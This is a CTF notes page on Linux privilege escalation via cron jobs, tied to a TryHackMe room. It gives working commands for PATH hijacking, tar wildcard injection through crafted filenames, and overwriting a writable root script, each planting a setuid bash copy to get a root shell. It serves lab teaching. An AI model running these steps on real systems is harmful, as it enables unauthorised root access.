ctfnote.com
Search
K

Cron Jobs

/etc/crontab

What are Cron Jobs?

In Linux, scheduled tasks are called cron jobs. Cronjobs are defined in /etc/crontab (cron table). If we are able to write malicious payload to a script that is executed automatically every minute or so, then this payload will be triggered as root because of the cronjob.

Enumeration

Enumerate crontab:
cat /etc/crontab
For example:
crontab
Here five asterisks means "every minute of every day of every week of every month, that command runs", hence overwrite.sh and /usr/local/bin/compress.sh will be executed every minute.
If we don't have permission to read /etc/crontab, pspy can help us identify scheduled tasks as well.

Method 1: Cron Path

Recall the crontab:
crontab
Note that overwrite.sh is executed using relative path and the $PATH variable is:
/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
If we create a malicious overwrite.sh in /home/user, then this malicious script will be executed as cronjob.
Create a malicious overwrite.sh in /home/user:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
Don't forget to give it permission:
chmod +x overwrite.sh
Wait a moment until you believe that this script gets executed. Try getting a root shell:
/tmp/bash -p

Method 2: Cron Wildcard

Recall the crontab:
crontab
Examine the content of /usr/local/bin/compress.sh:
/usr/local/bin/compress.sh
Notice the wildcard used by tar. This script intends to backup the /home/user directory. Here we can store a privesc payload in /home/user/runme.sh and use tar injection to let cronjob execute the following command:
tar czf /tmp/backup.tar.gz --checkpoint=1 --checkpoint-action=exec=sh\ runme.sh
Create a privesc payload /home/user/runme.sh:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
Give it permission:
chmod +x /home/user/runme.sh
Prepare tar injection part 1:
touch /home/user/--checkpoint=1
Prepare tar injection part 2:
touch /home/user/--checkpoint-action=exec=sh\ runme.sh
Wait a moment until you believe that this script gets executed. Try getting a root shell:
/tmp/bash -p

Method 3: Cron File Overwrite

Recall the crontab:
crontab
Examine its permission:
Permission
Since this script is owned by root and it is executable, we can simply append a privesc payload (or reverse shell payload) to this file and wait for cronjob to execute it.
Ovewrite /usr/local/bin/overwrite.sh with a privesc payload:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh
Wait a moment until you believe that this script gets executed. Try getting a root shell:
/tmp/bash -p

Challenge: TryHackMe - CMesS